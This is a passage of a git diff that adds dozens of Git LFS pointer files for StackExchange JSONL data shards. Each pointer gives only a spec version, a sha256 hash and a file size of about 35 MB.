sha256:d940d08c8cbb467ce707dfdb8211d983cce4c68f6c2b268f1f9ea05711e2d5f0 +size 35010625 diff --git a/data/stackexchange/1-1/1612_2289.jsonl b/data/stackexchange/1-1/1612_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1fd81f6272bb03162305c447896837e37fdc109e --- /dev/null +++ b/data/stackexchange/1-1/1612_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:688ba9c94f2c23e4fbd8083966bd0c41d5804b6c0e82425f732985a6708cf19d +size 34787075 diff --git a/data/stackexchange/1-1/1613_2289.jsonl b/data/stackexchange/1-1/1613_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..63898c77d8c4b5311c446b933426903f01518122 --- /dev/null +++ b/data/stackexchange/1-1/1613_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e2f333c69c55c52fa032968af769dd4e14580213a6660dc1ab34e7a9ddf7acd6 +size 34304089 diff --git a/data/stackexchange/1-1/1614_2289.jsonl b/data/stackexchange/1-1/1614_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..04615b942f10ae69fffeb68afb7b9506a156383c --- /dev/null +++ b/data/stackexchange/1-1/1614_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6c8da8e9e3419250bce0c9ca926fc9caa8846febea58f5cf742e713be22fc515 +size 34467321 diff --git a/data/stackexchange/1-1/1615_2289.jsonl b/data/stackexchange/1-1/1615_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..59886ebb15a3d449ff3bc5a7a34f59a6877508f1 --- /dev/null +++ b/data/stackexchange/1-1/1615_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ba8564e82faef89d15d8f443ebc07d2a4003f49fdced5f58b649c99179b67137 +size 34554096 diff --git a/data/stackexchange/1-1/1616_2289.jsonl b/data/stackexchange/1-1/1616_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e5914b02fb9cdcaa58b5c48b49781506c175e411 --- /dev/null +++ b/data/stackexchange/1-1/1616_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dcfbbe5ad760fabc395c7412a79e4fe43f2ca23e001b6751055e145ffff39db0 +size 34574320 diff --git a/data/stackexchange/1-1/1617_2289.jsonl b/data/stackexchange/1-1/1617_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..86ba709fb4d2deab42a16d5075e874dee3385828 --- /dev/null +++ b/data/stackexchange/1-1/1617_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e18b1fe5cf90cb9254422f2ce62da89b535e2a3c235586ea18229811f35148aa +size 34901548 diff --git a/data/stackexchange/1-1/1618_2289.jsonl b/data/stackexchange/1-1/1618_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dc204bb7e3b1b5263debab5649c34f142c144d53 --- /dev/null +++ b/data/stackexchange/1-1/1618_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cc82c17bd972b22bc271f3df49a207089dde57683eeb2c46bb9a2fa40290c5f0 +size 34454941 diff --git a/data/stackexchange/1-1/1619_2289.jsonl b/data/stackexchange/1-1/1619_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e62be593ca752058fd2a0514458d3be45efc5095 --- /dev/null +++ b/data/stackexchange/1-1/1619_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8bc2939b9b86f2609718493102b0d32eb4b65ae535788dfa9e5306ed92282d90 +size 34539077 diff --git a/data/stackexchange/1-1/161_2289.jsonl b/data/stackexchange/1-1/161_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..1ce319c5787af06950a9293c8f5d37e0a7ec5950 --- /dev/null +++ b/data/stackexchange/1-1/161_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5598ede65ca529c5f724b80041995ce87d6a47f9007b0e6726d90730a3c0be70 +size 34815589 diff --git a/data/stackexchange/1-1/1620_2289.jsonl b/data/stackexchange/1-1/1620_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2f9b7de0405a58bf4c0b68b5f32395b99ce26aae --- /dev/null +++ b/data/stackexchange/1-1/1620_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bb3bc99999a0b427dbc333f4f2bcadaa6b7ee21751e742d80014c3e2c0032fd6 +size 34628283 diff --git a/data/stackexchange/1-1/1621_2289.jsonl b/data/stackexchange/1-1/1621_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bef7600432703997d339120406307e3abfcab1ea --- /dev/null +++ b/data/stackexchange/1-1/1621_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f4d2eec0f32c109e83995f6ef422cb9bff6bde63d2b23a11fed45f328996c7a +size 34989209 diff --git a/data/stackexchange/1-1/1622_2289.jsonl b/data/stackexchange/1-1/1622_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2b737dcdedc88a48655e95f2aab77d9f0b492c77 --- /dev/null +++ b/data/stackexchange/1-1/1622_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:8808567354b6f3e6dcf56ff402ec041064c48a3fa562c3d38bf7fa7157c2d4fe +size 33901065 diff --git a/data/stackexchange/1-1/1623_2289.jsonl b/data/stackexchange/1-1/1623_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..7fc90f1e87b92b4e67f44a32bc754f8530197b64 --- /dev/null +++ b/data/stackexchange/1-1/1623_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e57e5bd3af3b17bcbba3dc41d24039e44ae25707edf25ed718e27d8da58acb7a +size 35035414 diff --git a/data/stackexchange/1-1/1624_2289.jsonl b/data/stackexchange/1-1/1624_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..991d34c39efd5e667d9141fc1f431d56db45d762 --- /dev/null +++ b/data/stackexchange/1-1/1624_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a2967d8b82a0acf5859fe9725ee906454fb8a0e3b5ff82bf8c53e83470b78012 +size 34355113 diff --git a/data/stackexchange/1-1/1625_2289.jsonl b/data/stackexchange/1-1/1625_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..88060bc0dab1b23bd11439be00c135fac7532c0e --- /dev/null +++ b/data/stackexchange/1-1/1625_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:af81dcea1c2bec5d2888a94d39c0709ec96a51ae310d3a03c0562c469629a9e2 +size 34264479 diff --git a/data/stackexchange/1-1/1626_2289.jsonl b/data/stackexchange/1-1/1626_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ec2ab017e1df3fc875f135d185895f860c179f0 --- /dev/null +++ b/data/stackexchange/1-1/1626_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:506cad88bc4712785a0b1c81d1273f2bc5527beaf2054f3840e7b57b950c33f5 +size 34442536 diff --git a/data/stackexchange/1-1/1627_2289.jsonl b/data/stackexchange/1-1/1627_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4804130da0836e0ffdf3b0f5f6b482494b42df81 --- /dev/null +++ b/data/stackexchange/1-1/1627_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:e4dd5dc4ede72fd3c6479f4b3c1d092fd556ac8d4425c7019bf3ec488b4d6b31 +size 34232724 diff --git a/data/stackexchange/1-1/1628_2289.jsonl b/data/stackexchange/1-1/1628_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f482501b25d0e3adc9f925f1a612e320ec8d992b --- /dev/null +++ b/data/stackexchange/1-1/1628_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:002f261ab1c2e94f119209962c0e7391d277f6c9871f8a71e87ae7eac4092d1f +size 34694661 diff --git a/data/stackexchange/1-1/1629_2289.jsonl b/data/stackexchange/1-1/1629_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d33a73aef8d75e7aa859da8338b2edfb278d4ba5 --- /dev/null +++ b/data/stackexchange/1-1/1629_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17a2b13fdd69e8a973f64d7b3370229bf119ca2c0b9d5d6b6fe20f7f530503b6 +size 34480225 diff --git a/data/stackexchange/1-1/162_2289.jsonl b/data/stackexchange/1-1/162_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ceab5b02981d963ee599a744a7f55265fa82fef3 --- /dev/null +++ b/data/stackexchange/1-1/162_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:830e17411b53c4f10c9e3971b136933febcd4cd68ceab9064d8bad8400e81d38 +size 34197512 diff --git a/data/stackexchange/1-1/1630_2289.jsonl b/data/stackexchange/1-1/1630_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c04341e400584e9d0326e66d67056d9de95688ec --- /dev/null +++ b/data/stackexchange/1-1/1630_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9c4251c268b2c72ac17ee214fb351a3e344c86944c1411bf44d03b6a9ccbdcd7 +size 34880761 diff --git a/data/stackexchange/1-1/1631_2289.jsonl b/data/stackexchange/1-1/1631_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..36c09c5eb76ea7d9162bf59d5218cdf2ffa29135 --- /dev/null +++ b/data/stackexchange/1-1/1631_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93267a64f183498c69ab6c2731cae41d9dedc9a5ba8a9cb6fd505f08791d9472 +size 34154941 diff --git a/data/stackexchange/1-1/1632_2289.jsonl b/data/stackexchange/1-1/1632_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ea8f0ae5389b61f519a50314b8f42d26944306c --- /dev/null +++ b/data/stackexchange/1-1/1632_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fe9421b41c63482cd2ab10cc642cafc857fd54d397862654e6cc432e551b4915 +size 34640194 diff --git a/data/stackexchange/1-1/1633_2289.jsonl b/data/stackexchange/1-1/1633_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..74845eef9157f86db4662858e6a1d98987c57ad3 --- /dev/null +++ b/data/stackexchange/1-1/1633_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:59c0bd63020c8e3c371c2c25573c670a5579a45ea4ce7f936ecbb941aa079397 +size 34132664 diff --git a/data/stackexchange/1-1/1634_2289.jsonl b/data/stackexchange/1-1/1634_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4191db5af9274ac981834bc89b4d527b2641c6d8 --- /dev/null +++ b/data/stackexchange/1-1/1634_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad6a688bca6a2c5de094c9975ab10bba94aa5db866eea6953244d5c1cb10a06f +size 34478793 diff --git a/data/stackexchange/1-1/1635_2289.jsonl b/data/stackexchange/1-1/1635_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..297e6f575a411cd8ed8a49ae84772e84c44765c1 --- /dev/null +++ b/data/stackexchange/1-1/1635_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a1f45591d920a7e2e4e938ecb2fe3a1a05597ec089a5c7f81be6d113ec424b1 +size 35037631 diff --git a/data/stackexchange/1-1/1636_2289.jsonl b/data/stackexchange/1-1/1636_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..144c208a45994a902af54de14319948cf39fd125 --- /dev/null +++ b/data/stackexchange/1-1/1636_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d67fa603af060e0888e06fca3a863f3cba222e2e3adb2d674d45e367a9265757 +size 34962362 diff --git a/data/stackexchange/1-1/1637_2289.jsonl b/data/stackexchange/1-1/1637_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b53aeb580feb45c672895da4fa79326a388c3169 --- /dev/null +++ b/data/stackexchange/1-1/1637_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4f216edb1b4dff97b2df28af0375cffe26f91c1a0b8432780955402c76d23a4e +size 34537379 diff --git a/data/stackexchange/1-1/1638_2289.jsonl b/data/stackexchange/1-1/1638_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3678d5cdcdf050e20334ec1d7ec8652026c93b27 --- /dev/null +++ b/data/stackexchange/1-1/1638_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5a0596e9d8a4012c0f5bc4389262e260239e976c9792dc6e88e1c3c853711e61 +size 34169423 diff --git a/data/stackexchange/1-1/1639_2289.jsonl b/data/stackexchange/1-1/1639_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1bf006c1194ae55822dd098a6ff247a85807bca7 --- /dev/null +++ b/data/stackexchange/1-1/1639_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a42a1f68c3e26764170ce23f3f9b7e76f907e30e68c419a64365ce31e9bcf57 +size 35448192 diff --git a/data/stackexchange/1-1/163_2289.jsonl b/data/stackexchange/1-1/163_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d977b701404c54220d01dd0a92fccec7c5239db9 --- /dev/null +++ b/data/stackexchange/1-1/163_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:790f4db56df7e006ff7f4105417fff4fa5cd97c7445d08d56b7a7333f8de9107 +size 35461840 diff --git a/data/stackexchange/1-1/1640_2289.jsonl b/data/stackexchange/1-1/1640_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..27f624ac24accbc01eda524829a98c09a32e6e3e --- /dev/null +++ b/data/stackexchange/1-1/1640_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9008bb383b2b71da8932d322713fb65804d38c947afbc92997261b56906287ff +size 35143787 diff --git a/data/stackexchange/1-1/1641_2289.jsonl b/data/stackexchange/1-1/1641_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..672996fe5bc89e88d58ee9bf8d62d5f28c70617e --- /dev/null +++ b/data/stackexchange/1-1/1641_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9bd11a0b20d3c6b1c5b7125c903f2bdf7435867a25288387c64320e65bdc7d3b +size 35236588 diff --git a/data/stackexchange/1-1/1642_2289.jsonl b/data/stackexchange/1-1/1642_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1f81ba4353f2a58503aa46a3262533e270b3838d --- /dev/null +++ b/data/stackexchange/1-1/1642_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:3280ac878e179d11f536157d8efb00463e58cf562053857e5f6f7df417dc28e2 +size 35386827 diff --git a/data/stackexchange/1-1/1643_2289.jsonl b/data/stackexchange/1-1/1643_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..34ac45074f7354ffb40b5e674cbdbae3025fe6d9 --- /dev/null +++ b/data/stackexchange/1-1/1643_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e8cec7d49799e0cbce564cdacee949597bb6a5117e2910483613eafea5f3bfa6 +size 35733606 diff --git a/data/stackexchange/1-1/1644_2289.jsonl b/data/stackexchange/1-1/1644_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..6e85f1017fa36a61a37918a36ff04e7cabaa7b63 --- /dev/null +++ b/data/stackexchange/1-1/1644_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6a464aaa36e95a1462a3019e3677119cfaea3c96d3a3359290c56b778cd55c81 +size 35222773 diff --git a/data/stackexchange/1-1/1645_2289.jsonl b/data/stackexchange/1-1/1645_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b8f39753e71abf7dc167e36982e0fb321dc2198 --- /dev/null +++ b/data/stackexchange/1-1/1645_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:373bf6418eba6f267eb98743392aef30eba19b97e11395043c2cb3f6f87d40c4 +size 35349385 diff --git a/data/stackexchange/1-1/1646_2289.jsonl b/data/stackexchange/1-1/1646_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b48cd778a391bf94069772d17780837834f4a4c7 --- /dev/null +++ b/data/stackexchange/1-1/1646_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c2d231088f85d57732a6282297f618f7814310db3e796ae189dcfd04b7632b47 +size 34980316 diff --git a/data/stackexchange/1-1/1647_2289.jsonl b/data/stackexchange/1-1/1647_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e65a93a0579b22f2aaaef82c0ffcaa7e61f01e08 --- /dev/null +++ b/data/stackexchange/1-1/1647_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4ccd7b0a2c4ed5470cfbc9e541a9025f203245a81dc786de1d9c5dfc66dbc679 +size 35728161 diff --git a/data/stackexchange/1-1/1648_2289.jsonl b/data/stackexchange/1-1/1648_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0d59687e5899758576474b5fa64e5166850fe072 --- /dev/null +++ b/data/stackexchange/1-1/1648_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a169689a82b068a00e829bb8dbaca014aca88fcb0417809713732f516f05489d +size 35249508 diff --git a/data/stackexchange/1-1/1649_2289.jsonl b/data/stackexchange/1-1/1649_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..facb6b3044cf01af08da14414a8948398a1de457 --- /dev/null +++ b/data/stackexchange/1-1/1649_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d6edd9eaca0b1dbb4c46a687fff4d4e9417584780cdadc01507932b3245f9532 +size 35892690 diff --git a/data/stackexchange/1-1/164_2289.jsonl b/data/stackexchange/1-1/164_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..862f8d331bea0c2b1f5aef86da60bee197c43f91 --- /dev/null +++ b/data/stackexchange/1-1/164_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8e4e87ac96fc083c7cd529916ff0c5b4531a5ed1a1131bde8329202782e332d +size 35149294 diff --git a/data/stackexchange/1-1/1650_2289.jsonl b/data/stackexchange/1-1/1650_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..18854521566f2be65ca388b42745cd1521f87712 --- /dev/null +++ b/data/stackexchange/1-1/1650_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f124c9ffe789ce3e4586fe5d1a1dfe7a40ea29f43938228da388c8d7c8f6fb02 +size 35092454 diff --git a/data/stackexchange/1-1/1651_2289.jsonl b/data/stackexchange/1-1/1651_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..619fdf5d10f1c3a7f28a0a2d00203fc5380c224d --- /dev/null +++ b/data/stackexchange/1-1/1651_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:14bb7b4f44b0c962eef3daea3e2cb47d06e29fc5bbef364aed4ac7b7a3aea736 +size 35465507 diff --git a/data/stackexchange/1-1/1652_2289.jsonl b/data/stackexchange/1-1/1652_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..3f1085060bf0f648485bc333118225800239a4b9 --- /dev/null +++ b/data/stackexchange/1-1/1652_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:80513841f181d331b37564fb5601667d3778fc986b3f2cd315a525c353ec5ee9 +size 34947902 diff --git a/data/stackexchange/1-1/1653_2289.jsonl b/data/stackexchange/1-1/1653_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a22299808c39dd9e783aa14f2573ac28c48415c9 --- /dev/null +++ b/data/stackexchange/1-1/1653_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4b5277fa55efbec1593681a2b1b6e0bc24ad52e541e88bb44c5dc8beb7bbeb26 +size 35384156 diff --git a/data/stackexchange/1-1/1654_2289.jsonl b/data/stackexchange/1-1/1654_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..cae39c9259dc4ed2db7e06a6727b73f989f610af --- /dev/null +++ b/data/stackexchange/1-1/1654_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f6cabf9b00d6f696c3c1b39d05dfe1d10c11acfddddaf51e942e2144e0d92db9 +size 35402589 diff --git a/data/stackexchange/1-1/1655_2289.jsonl b/data/stackexchange/1-1/1655_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ac112f6ceec92c10f2acd2617565780dd253c70a --- /dev/null +++ b/data/stackexchange/1-1/1655_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1e4a81026540c857c3df805703d557fa5e3e3f3761959bc5620c361d578aeabd +size 34957320 diff --git a/data/stackexchange/1-1/1656_2289.jsonl b/data/stackexchange/1-1/1656_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b7ab504c2b1490e1681d61fb6253cd9e587bc5c4 --- /dev/null +++ b/data/stackexchange/1-1/1656_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ad31313fdaa8b1e58758bdd54941516c0ad54bed7ba4338f4000fcce440b4c63 +size 35168900 diff --git a/data/stackexchange/1-1/1657_2289.jsonl b/data/stackexchange/1-1/1657_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..901a54200c7b55537241706c0d07cef251342914 --- /dev/null +++ b/data/stackexchange/1-1/1657_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:69edf5e7185c04d14a00ceca3ba40a25fe109f5e4bfd1c14f3d0ddf058a39c31 +size 35728263 diff --git a/data/stackexchange/1-1/1658_2289.jsonl b/data/stackexchange/1-1/1658_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..fd9bb5bb7269f714e6adaa2bfebb27236d56e4f1 --- /dev/null +++ b/data/stackexchange/1-1/1658_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 
sha256:7c67615724b1412522c3f359f852696d877a3505fcf7ea552729c232a66c61ef +size 35538388 diff --git a/data/stackexchange/1-1/1659_2289.jsonl b/data/stackexchange/1-1/1659_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ad2a98c99e3938347e9abe9b1c419f443f769086 --- /dev/null +++ b/data/stackexchange/1-1/1659_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cef67ec19d06b3c8b725cb0657032eb8004c5fef8d627b9c8ab8674bb24b8284 +size 35624105 diff --git a/data/stackexchange/1-1/165_2289.jsonl b/data/stackexchange/1-1/165_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b55d04eb4e9f9f09294127837933741b473b9bc0 --- /dev/null +++ b/data/stackexchange/1-1/165_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6685d42f21911872960525aa7b69e37a1bf1165c161579c2bff59b013a87b190 +size 34792606 diff --git a/data/stackexchange/1-1/1660_2289.jsonl b/data/stackexchange/1-1/1660_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..21b9d97d8623299e50ee9c8cb29a8dbfdebe4e4c --- /dev/null +++ b/data/stackexchange/1-1/1660_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79ce66ddb63708e72ab0e3724cb00c6e974feaf75195ee72b8251a81c6a2af8d +size 35179707 diff --git a/data/stackexchange/1-1/1661_2289.jsonl b/data/stackexchange/1-1/1661_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9b1450a459df9d62e220ddcb9c7f83ffa091fa83 --- /dev/null +++ b/data/stackexchange/1-1/1661_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:57f5e7cfdfe09a970200146ddcc8048f611e2137ccbf6ceda54f54ec613b8920 +size 35442654 diff --git a/data/stackexchange/1-1/1662_2289.jsonl b/data/stackexchange/1-1/1662_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..30e68b39e090b1d7cd8f460d0fa869de2e81dce8 --- /dev/null +++ b/data/stackexchange/1-1/1662_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:38a64596673692b2719813544aa4fbb8f374be9b5ce6ca631faf1f5d46764840 +size 35552048 diff --git a/data/stackexchange/1-1/1663_2289.jsonl b/data/stackexchange/1-1/1663_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..062a7dfe6316e42b30a9de92f97aead18a20de90 --- /dev/null +++ b/data/stackexchange/1-1/1663_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a381694894580e8db780962899bf18e1eb58dcaa8878880ba4a214ddcd0823c +size 34898462 diff --git a/data/stackexchange/1-1/1664_2289.jsonl b/data/stackexchange/1-1/1664_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..24515c222915a1a47122266381bbbf5735f12c30 --- /dev/null +++ b/data/stackexchange/1-1/1664_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:826d3258aa3523b4caf8c9ee10cedd6b9afdd59ff445774e884b42d0191ba7c6 +size 36229054 diff --git a/data/stackexchange/1-1/1665_2289.jsonl b/data/stackexchange/1-1/1665_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4db25d6663fca3fdd319521ebc34eeb03df2478b --- /dev/null +++ b/data/stackexchange/1-1/1665_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3a3d68a5ed16a5f3489ba4bf4e550daeb097343bbe2a5d53240d38f30d708623 +size 35639893 diff --git a/data/stackexchange/1-1/1666_2289.jsonl b/data/stackexchange/1-1/1666_2289.jsonl new file mode 100644 index 
0000000000000000000000000000000000000000..c0c27440a2c4780256d18df315e8d272ab11978c --- /dev/null +++ b/data/stackexchange/1-1/1666_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a3bc91daf8d841cca7f4e84f699f93836529e48b4e05270c1fa77593327229fc +size 35318376 diff --git a/data/stackexchange/1-1/1667_2289.jsonl b/data/stackexchange/1-1/1667_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c99491be0646cbb8f2b74ffbe8fbbd0af7c8f85a --- /dev/null +++ b/data/stackexchange/1-1/1667_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3f9b7f9be669ec57711c5de6756a326be8544c1c5d5ae4475e4e903f2c35ba84 +size 35436074 diff --git a/data/stackexchange/1-1/1668_2289.jsonl b/data/stackexchange/1-1/1668_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0225f324ea62b22cdb6504e3e7022bcd49094d85 --- /dev/null +++ b/data/stackexchange/1-1/1668_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf126b4088f79e6859e43ff8a33f31b691f8bd97fee109b70873b355910b282c +size 35255253 diff --git a/data/stackexchange/1-1/1669_2289.jsonl b/data/stackexchange/1-1/1669_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8ae5151d4c0f37103142fee1ad13649e1635e4a6 --- /dev/null +++ b/data/stackexchange/1-1/1669_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:15bd016b2df3fd2088bb28e53e4f65e29bb3a7a3bd4f7da99ca62ca9131ee1b6 +size 35392124 diff --git a/data/stackexchange/1-1/166_2289.jsonl b/data/stackexchange/1-1/166_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..526bc3c6e62d9cfd164b86c2a275d1002a60fc0d --- /dev/null +++ b/data/stackexchange/1-1/166_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d8585857e52f9eb4aa886735105f57d2459c240e98b1dac972995ad5a2cc8afd +size 34622656 diff --git a/data/stackexchange/1-1/1670_2289.jsonl b/data/stackexchange/1-1/1670_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f2ad0a363435c35bc553ed67fd5bd951f021480f --- /dev/null +++ b/data/stackexchange/1-1/1670_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid 